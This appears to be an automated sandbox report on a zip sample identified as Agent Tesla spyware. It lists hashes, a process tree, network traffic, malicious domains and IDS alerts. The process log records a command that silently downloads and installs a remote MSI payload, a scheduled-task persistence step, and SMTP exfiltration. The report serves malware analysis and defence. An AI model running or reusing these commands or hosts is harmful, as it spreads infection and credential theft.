File name: | Sample1.zip |
Full analysis: | https://app.any.run/tasks/c261d626-7870-4b60-90fb-06510bc9fb47 |
Verdict: | Malicious activity |
Threats: | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as legitimate software on the dedicated website where this malware is sold. |
Analysis date: | July 17, 2019, 15:00:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 36CA9A3E3253C409866D609C43DA6C11 |
SHA1: | 24DBB1F7C7D844C7981E334FCCF00578AEC7699D |
SHA256: | 05C73FC0CCB3099D77B39FC7ABF255B12A9BE58B91D0DF16B20542098440BF9B |
SSDEEP: | 12288:pNYh/zAmrTgfnJXyJoQLnl97cUUs427556xHNesoJ3wY4R:pK9BrUfnJXyJfzl9wUUw55sHNDoJ3wfR |
.zip | ZIP compressed archive (100) |
ZipFileName: | faf195e07868c79a597306269b2f4fd7eef96257d46a56beb5dd3b7792e200dd.bin |
ZipUncompressedSize: | 3128275 |
ZipCompressedSize: | 456612 |
ZipCRC: | 0xfae53e8f |
ZipModifyDate: | 2019:07:17 14:59:28 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0001 |
ZipRequiredVersion: | 788 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3716 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Sample1.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 |
3628 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\ayy.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 |
1812 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 |
3912 | cmd.exe & /C CD C: & msiexec.exe /i http://baladefarms.ga/a/kali.msi /qn | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
3552 | msiexec.exe /i http://baladefarms.ga/a/kali.msi /qn | C:\Windows\system32\msiexec.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
3736 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | — | services.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
2264 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 |
3556 | "C:\Windows\Installer\MSIB73.tmp" | C:\Windows\Installer\MSIB73.tmp | — | msiexec.exe |
User: admin Company: Saab Integrity Level: MEDIUM Description: Platformer Exit code: 0 Version: 1.0.0.0 |
2136 | "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AGOkcrwBoew" /XML "C:\Users\admin\AppData\Local\Temp\tmpC942.tmp" | C:\Windows\System32\schtasks.exe | — | MSIB73.tmp |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
2948 | "C:\Windows\Installer\MSIB73.tmp" | C:\Windows\Installer\MSIB73.tmp | — | MSIB73.tmp |
User: admin Company: Saab Integrity Level: MEDIUM Description: Platformer Version: 1.0.0.0 |
PID | Process | Filename | Type |
---|---|---|---|
3716 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb3716.17274\faf195e07868c79a597306269b2f4fd7eef96257d46a56beb5dd3b7792e200dd.bin | — |
MD5: — | SHA256: — |
3628 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD618.tmp.cvr | — |
MD5: — | SHA256: — |
3736 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DFD2C777E45AD6DDDB.TMP | — |
MD5: — | SHA256: — |
3736 | msiexec.exe | C:\Config.Msi\f0a2a.rbs | — |
MD5: — | SHA256: — |
3736 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF56E92892C7A7FD86.TMP | — |
MD5: — | SHA256: — |
3628 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ayy.doc.LNK | lnk |
MD5: 6232F89C80455E125FE9A425A20CA2C7 | SHA256: BF1DEBB31C32EA1CDB9DDC334F7B5A4C0E850A1F2C1909702189D140DE11EAAA |
3628 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc |
MD5: 1D77B4343C9257A087C48F6ECDD56D1D | SHA256: 5A4B1B2C1C4A9C87379FAD1843DBA5EEAF6C9D2C059EA3B4E2E47CC8F3FAAFC3 |
3628 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text |
MD5: BF5190F8289D6BF67AD3F1DFC9FFC77C | SHA256: 7C4163D0118D50C17F74FBB366E9FDEB063E1DE71C5137F36D4A89468E2C3217 |
3628 | WINWORD.EXE | C:\Users\admin\Desktop\~$ayy.doc | pgc |
MD5: 6BEF9D61BC105D4011A1662C078F9DE7 | SHA256: A4941AE925A9920FE618E5AD1DAD2278B00C84C9668DE74627DC4D1677B88EAC |
3736 | msiexec.exe | C:\Windows\Installer\MSI5D3.tmp | executable |
MD5: 66DC5CBECDE84CBA63F93ACF04C88CDD | SHA256: F921D0896EF13ACE46F57819AA12A379D54DEFE42B3B338C0BEDBAFD2ACE0F9E |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3736 | msiexec.exe | GET | 200 | 198.54.125.61:80 | http://baladefarms.ga/a/kali.msi | US | executable | 1016 Kb | malicious |
2948 | MSIB73.tmp | GET | 200 | 52.6.79.229:80 | http://checkip.amazonaws.com/ | US | text | 14 b | shared |
916 | opera.exe | GET | 200 | 93.184.220.29:80 | http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl | US | der | 528 b | whitelisted |
916 | opera.exe | GET | — | 198.54.125.61:80 | http://baladefarms.ga/a/ | US | — | — | malicious |
916 | opera.exe | GET | 200 | 172.217.18.110:80 | http://clients1.google.com/complete/search?q=bala&client=opera-suggest-omnibox&hl=de | US | text | 111 b | whitelisted |
916 | opera.exe | GET | 200 | 172.217.18.110:80 | http://clients1.google.com/complete/search?q=baladefarms&client=opera-suggest-omnibox&hl=de | US | text | 42 b | whitelisted |
916 | opera.exe | GET | 200 | 172.217.18.110:80 | http://clients1.google.com/complete/search?q=bal&client=opera-suggest-omnibox&hl=de | US | text | 104 b | whitelisted |
916 | opera.exe | GET | 200 | 172.217.18.110:80 | http://clients1.google.com/complete/search?q=balade&client=opera-suggest-omnibox&hl=de | US | text | 107 b | whitelisted |
916 | opera.exe | GET | 200 | 172.217.18.110:80 | http://clients1.google.com/complete/search?q=balad&client=opera-suggest-omnibox&hl=de | US | text | 79 b | whitelisted |
916 | opera.exe | GET | 400 | 185.26.182.112:80 | http://sitecheck2.opera.com/?host=baladefarms.ga&hdn=nP81LKSPtXaS/1zzensL1Q== | unknown | html | 150 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
916 | opera.exe | 185.26.182.94:443 | certs.opera.com | Opera Software AS | — | whitelisted |
916 | opera.exe | 172.217.18.110:80 | clients1.google.com | Google Inc. | US | whitelisted |
2948 | MSIB73.tmp | 52.6.79.229:80 | checkip.amazonaws.com | Amazon.com, Inc. | US | shared |
916 | opera.exe | 198.54.125.61:80 | baladefarms.ga | Namecheap, Inc. | US | malicious |
916 | opera.exe | 93.184.220.29:80 | crl4.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
916 | opera.exe | 185.26.182.112:80 | sitecheck2.opera.com | Opera Software AS | — | malicious |
2948 | MSIB73.tmp | 198.54.125.61:26 | baladefarms.ga | Namecheap, Inc. | US | malicious |
3736 | msiexec.exe | 198.54.125.61:80 | baladefarms.ga | Namecheap, Inc. | US | malicious |
Domain | IP | Reputation |
---|---|---|
baladefarms.ga | | malicious |
certs.opera.com | | whitelisted |
crl4.digicert.com | | whitelisted |
clients1.google.com | | whitelisted |
checkip.amazonaws.com | | shared |
sitecheck2.opera.com | | whitelisted |
mail.sweeddehacklord.us | | malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .ga Domain |
3736 | msiexec.exe | Potential Corporate Privacy Violation | SUSPICIOUS [PTsecurity] Executable application_x-msi Download |
3736 | msiexec.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] Executable application_x-msi Download |
3736 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Executable ExeToMSI Download |
2948 | MSIB73.tmp | A Network Trojan was detected | MALWARE [PTsecurity] AgentTesla IP Check |
2948 | MSIB73.tmp | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |
2948 | MSIB73.tmp | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |
2948 | MSIB73.tmp | A Network Trojan was detected | MALWARE [PTsecurity] Trojan-Spy.Keylogger.AgentTesla Exfiltration by SMTP |